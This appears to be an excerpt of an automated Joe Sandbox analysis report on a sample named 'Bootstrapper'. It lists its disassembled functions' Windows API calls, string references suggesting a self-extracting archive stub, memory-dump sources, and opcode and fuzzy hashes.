Instruction Fuzzy Hash: 09F0C2727802229F8B264F766C889EA66C96F257893443479FD05F3310EB50CCD89A90

Function 00E28900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00E2891E

Part of subcall function 00E28DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?), ref: 00E28DE2
Part of subcall function 00E28DCC: GetLastError.KERNEL32(?,?,00E2C896,?,00000000,?,00000000,?,00E2C8BD,?,00000007,?,?,00E2CCBA,?,?), ref: 00E28DF4

_free.LIBCMT ref: 00E28930
_free.LIBCMT ref: 00E28943
_free.LIBCMT ref: 00E28954
_free.LIBCMT ref: 00E28965

Strings

p, xrefs: 00E28914

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: p
API String ID: 776569668-2678736219
Opcode ID: 087211a04c9b8e799836097e8b978d017e4666f1d1f3c10394069950e5903e48
Instruction ID: af36624578b68cc1361f5ba2ff41207e639dae01e3761f5c22c776479aa05e53
Opcode Fuzzy Hash: 087211a04c9b8e799836097e8b978d017e4666f1d1f3c10394069950e5903e48
Instruction Fuzzy Hash: C7F03A718129368F96066F16FE0240A3FE9F724764300290AF218B23B5CBB9495DDB81

Function 00E1146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 00E114C2

Part of subcall function 00E0B146: GetVersionExW.KERNEL32(?), ref: 00E0B16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00E114E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 00E11500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00E11513
SystemTimeToFileTime.KERNEL32(?,?), ref: 00E11523
SystemTimeToFileTime.KERNEL32(?,?), ref: 00E11533

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 0d222a9e0499f701ceb05f95ce36f7f687cf310fbacd0fdc9f8b756ccf05d105
Instruction ID: 1c49044548ca06d95bd55dbd7d888d8ce1fec0e4395f11d947d92ddbff8020c7
Opcode Fuzzy Hash: 0d222a9e0499f701ceb05f95ce36f7f687cf310fbacd0fdc9f8b756ccf05d105
Instruction Fuzzy Hash: 5631F77910834AAFC704DFA9C88499BBBE8FF98714F005A1EF995D3210E730D549CBA6

Function 00E22AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00E22AF1,00E202FC,00E1FA34), ref: 00E22B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00E22B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E22B2F
SetLastError.KERNEL32(00000000,00E22AF1,00E202FC,00E1FA34), ref: 00E22B81

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 01e579418fa9a2f7d67f2a7d0ef3e549142fb07879a82b4c3119c9fa52ebd10d
Instruction ID: 1dba4cf7bfa3ecb36fb4383f01448f0937e9911ab7ff6e421b2db7a1db700a31
Opcode Fuzzy Hash: 01e579418fa9a2f7d67f2a7d0ef3e549142fb07879a82b4c3119c9fa52ebd10d
Instruction Fuzzy Hash: EC01F7321093397EEA242B767C89A672FD9EF11778760273EF210751E0EF554D049544

Function 00E297E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00E41030,00E24674,00E41030,?,?,00E23F73,00000050,?,00E41030,00000200), ref: 00E297E9
_free.LIBCMT ref: 00E2981C
_free.LIBCMT ref: 00E29844
SetLastError.KERNEL32(00000000,?,00E41030,00000200), ref: 00E29851
SetLastError.KERNEL32(00000000,?,00E41030,00000200), ref: 00E2985D
_abort.LIBCMT ref: 00E29863

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 217453550db31307d0290b1ab448761b444695f27b77dcaac100da28a043c99f
Instruction ID: 529a74c31e009a5220074e209b304fcb9122b64e880a8b07cde1938a51fcb458
Opcode Fuzzy Hash: 217453550db31307d0290b1ab448761b444695f27b77dcaac100da28a043c99f
Instruction Fuzzy Hash: 90F0A9351406316BC61D33357D09F5B1EA99FD2775F293134F615B21D3EE20880A4555

Function 00E1DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 00E1DC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E1DC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E1DC72
TranslateMessage.USER32(?), ref: 00E1DC7C
DispatchMessageW.USER32(?), ref: 00E1DC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 00E1DC91

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 182f72bcdcb93e60a1f8d111c23c3f38a3145ad1c65a36b7fc261ad3dd56ad3d
Instruction ID: 587f12efab581145063f1861070b7db33d4386e85f69bf0bbf91040045ee215c
Opcode Fuzzy Hash: 182f72bcdcb93e60a1f8d111c23c3f38a3145ad1c65a36b7fc261ad3dd56ad3d
Instruction Fuzzy Hash: 76F0EC72A01219BBCB206BA6ED4CDDBBF6DEF42796B004411F50AF2051D675968ACBE0

Function 00E1A80C Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 00E1A699: GetDC.USER32(00000000), ref: 00E1A69D
Part of subcall function 00E1A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E1A6A8
Part of subcall function 00E1A699: ReleaseDC.USER32(00000000,00000000), ref: 00E1A6B3

GetObjectW.GDI32(?,00000018,?), ref: 00E1A83C

Part of subcall function 00E1AAC9: GetDC.USER32(00000000), ref: 00E1AAD2
Part of subcall function 00E1AAC9: GetObjectW.GDI32(?,00000018,?), ref: 00E1AB01
Part of subcall function 00E1AAC9: ReleaseDC.USER32(00000000,?), ref: 00E1AB99

Strings

", xrefs: 00E1A89D, 00E1AAB9
(, xrefs: 00E1A9AA
A, xrefs: 00E1A9BA

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: "$($A
API String ID: 1061551593-2217482528
Opcode ID: f15faec05421548c988db8381bfcea1f584c9151858dd76618cf7193db45f785
Instruction ID: 6be9832cefd117b4bf032a0320e47b8513f4f2a92cbe34d2873ede57fb147bd8
Opcode Fuzzy Hash: f15faec05421548c988db8381bfcea1f584c9151858dd76618cf7193db45f785
Instruction Fuzzy Hash: 3E910271204344AFD610DF25D848D6BBBE8FFC8710F04592EF99AE3221DB71A949CB62

Function 00E0C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00E105DA: _wcslen.LIBCMT ref: 00E105E0

Part of subcall function 00E0B92D: _wcsrchr.LIBVCRUNTIME ref: 00E0B944

_wcslen.LIBCMT ref: 00E0C197
_wcslen.LIBCMT ref: 00E0C1DF

Strings

.rar, xrefs: 00E0C0E1, 00E0C134
.sfx, xrefs: 00E0C11A
.exe, xrefs: 00E0C10B

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: 401e911393677c82a9fedcba04c69ca2dd2a41e937d4eef0269081c11f5154eb
Instruction ID: 527597b7c387a9ceea0a92526aece777fb11ffda11a5057013304bae202213bc
Opcode Fuzzy Hash: 401e911393677c82a9fedcba04c69ca2dd2a41e937d4eef0269081c11f5154eb
Instruction Fuzzy Hash: 4B41F232501311A5C632AF749846ABBB3B8EF54708F347A4EF9817B5C2EBA04DC2C391

Function 00E0BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00E0BB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00E0A275,?,?,00000800,?,00E0A23A,?,00E0755C), ref: 00E0BBC5
_wcslen.LIBCMT ref: 00E0BC3B

Strings

UNC, xrefs: 00E0BBA7
\\?\, xrefs: 00E0BB52, 00E0BB99, 00E0BBF7, 00E0BC4E

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: 10b511db4b468861db0bd54a89ff2145a55681599ca63a45e802be562e8e525e
Instruction ID: 91ad9664260bef969ae0e9ef325764e471471c8ad5c55fe1574e5e4cf07de9c1
Opcode Fuzzy Hash: 10b511db4b468861db0bd54a89ff2145a55681599ca63a45e802be562e8e525e
Instruction Fuzzy Hash: 4141A031440216A6EF21AF20CC85EEEB7A9BF41394F156565F854B3291EBB4DED0CB60

Function 00E1CD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 00E1CD84

Part of subcall function 00E1AF98: _wcschr.LIBVCRUNTIME ref: 00E1B033

Part of subcall function 00E11FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E0C116,00000000,.exe,?,?,00000800,?,?,?,00E18E3C), ref: 00E11FD1

Strings

<, xrefs: 00E1CD68
MAX, xrefs: 00E1CDD9
HIDE, xrefs: 00E1CDC6
MIN, xrefs: 00E1CDF5

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _wcschr$CompareString
String ID: <$HIDE$MAX$MIN
API String ID: 69343711-3358265660
Opcode ID: 9cadc31a1bd01fcf21a31e265899990318b479e733a09343916e5170edf93d5c
Instruction ID: 9335d047d039aacbbbb92c48c508caed3b342cd855f79abab80eadcdfe70e879
Opcode Fuzzy Hash: 9cadc31a1bd01fcf21a31e265899990318b479e733a09343916e5170edf93d5c
Instruction Fuzzy Hash: B5317E72A40619AADF25CB60DC45BEE73BCEB15354F5091A6E901F7180EBB09AC48FA1

Function 00E1AAC9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00E1AAD2
GetObjectW.GDI32(?,00000018,?), ref: 00E1AB01
ReleaseDC.USER32(00000000,?), ref: 00E1AB99

Strings

7, xrefs: 00E1AB67
-, xrefs: 00E1AB32, 00E1AB3F, 00E1AB73, 00E1AB7F

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ObjectRelease
String ID: -$7
API String ID: 1429681911-474858286
Opcode ID: 9672f0597d25346b435a40f2a9986aea188acd291181d7bf9889a4315d0ef6a9
Instruction ID: f6d265c897618d98e16455ce0cd6913cf8843a858f90bb888a2b74adf7608a74
Opcode Fuzzy Hash: 9672f0597d25346b435a40f2a9986aea188acd291181d7bf9889a4315d0ef6a9
Instruction Fuzzy Hash: 32214C72108304BFD3409FA6EC48E6FBFE9FB89395F040919FA45A2121D7719A5C9B62

Function 00E0B991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00E0B9B8

Part of subcall function 00E04092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E040A5

_wcschr.LIBVCRUNTIME ref: 00E0B9D6
_wcschr.LIBVCRUNTIME ref: 00E0B9E6

Strings

%c:\, xrefs: 00E0B9AE

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: a603bd76cc915d7c912a509e5e8e188f265c753ef888b5ddfee75973e956128c
Instruction ID: 69b1cc968a9d949c118038e4eb404c99a4aaf8eaab856ce1ec5e5fef7f41f37c
Opcode Fuzzy Hash: a603bd76cc915d7c912a509e5e8e188f265c753ef888b5ddfee75973e956128c
Instruction Fuzzy Hash: 6B01F963600312B5DA306B359C85D6BA7ECFE95770B406D0EF544F60C2EB24D884C2B1

Function 00E1B270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00E01316: GetDlgItem.USER32(00000000,00003021), ref: 00E0135A
Part of subcall function 00E01316: SetWindowTextW.USER32(00000000,00E335F4), ref: 00E01370

EndDialog.USER32(?,00000001), ref: 00E1B2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00E1B2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 00E1B304

Strings

xz, xrefs: 00E1B2E2
GETPASSWORD1, xrefs: 00E1B289

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1$xz
API String ID: 445417207-3234807970
Opcode ID: 4db4b98231206c1d706d0e9184ea9e7a775162a486261100c84af0e3478dd413
Instruction ID: cdcc6da63053048e732f03d07476ffd407424935daafa9b7d7ed72be4c1cf1ff
Opcode Fuzzy Hash: 4db4b98231206c1d706d0e9184ea9e7a775162a486261100c84af0e3478dd413
Instruction Fuzzy Hash: 7211C432900118BADB219A74AD4AFFF376CEF5A754F001020FA45F61D0C7B5AA999761

Function 00E1B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 00E1B6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 00E1B712
DeleteObject.GDI32(00000000), ref: 00E1B744
DeleteObject.GDI32(00000000), ref: 00E1B767

Part of subcall function 00E1A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00E1B73D,00000066), ref: 00E1A6D5
Part of subcall function 00E1A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00E1B73D,00000066), ref: 00E1A6EC
Part of subcall function 00E1A6C2: LoadResource.KERNEL32(00000000,?,?,?,00E1B73D,00000066), ref: 00E1A703
Part of subcall function 00E1A6C2: LockResource.KERNEL32(00000000,?,?,?,00E1B73D,00000066), ref: 00E1A712
Part of subcall function 00E1A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00E1B73D,00000066), ref: 00E1A72D
Part of subcall function 00E1A6C2: GlobalLock.KERNEL32(00000000), ref: 00E1A73E
Part of subcall function 00E1A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00E1A762
Part of subcall function 00E1A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00E1A7A7
Part of subcall function 00E1A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00E1A7C6
Part of subcall function 00E1A6C2: GlobalFree.KERNEL32(00000000), ref: 00E1A7CD

Strings

], xrefs: 00E1B71A

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
String ID: ]
API String ID: 1797374341-3352871620
Opcode ID: 0c4ab8d79b363746b7011f6ddf3b61629abdd2862b5077dac925fac1a2978801
Instruction ID: 7d91030ed2e5cf494ed97fd85b406adf69461d44a25c8a02691df8ad05d2a4f3
Opcode Fuzzy Hash: 0c4ab8d79b363746b7011f6ddf3b61629abdd2862b5077dac925fac1a2978801
Instruction Fuzzy Hash: 7801D6369412016BC71277749D09AFF7AFA9FC17A6F081121F900B72D6DF718D8D4261

Function 00E1D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00E01316: GetDlgItem.USER32(00000000,00003021), ref: 00E0135A
Part of subcall function 00E01316: SetWindowTextW.USER32(00000000,00E335F4), ref: 00E01370

EndDialog.USER32(?,00000001), ref: 00E1D64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00E1D661
SetDlgItemTextW.USER32(?,00000066,?), ref: 00E1D675
SetDlgItemTextW.USER32(?,00000068), ref: 00E1D684

Strings

RENAMEDLG, xrefs: 00E1D618

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e00000_Bootstrapper.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: dd56221975e3fe8bb789772147bdec15be41ab14b714b8642a2ec02c8b3bf55d
Instruction ID: 81ae2f3aa5c5fc5d8488b5efe10b2daf721df8f2c9dd3996ee67a8cf99effa4c
Opcode Fuzzy Hash: dd56221975e3fe8bb789772147bdec15be41ab14b714b8642a2ec02c8b3bf55d
Instruction Fuzzy Hash: C1012833249310BED2114F75AD09FDB7B5CEB5AB42F110410F305B20D0C7A2998C8B79

Function 00E27E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00E27E24,00000000,?,00E27DC4,00000000,00E3C300,0000000C,00E27F1B,00000000,00000002), ref: 00E27E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E27EA6
FreeLibrary.KERNEL32(00000000,?,?,?,00E27E24,00000000,?,00E27DC4,00000000,00E3C300,0000000C,00E27F1B,00000000,00000002), ref: 00E27EC9

Strings

mscoree.dll, xrefs: 00E27E8C
CorExitProcess, xrefs: 00E27E9E

Memory Dump Source

Source File: 00000003.00000002.1827652202.0000000000E01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000003.00000002.1827519523.0000000000E00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827737121.0000000000E33000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E3E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E45000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827800653.0000000000E62000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.1827943994.0000000000E63000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

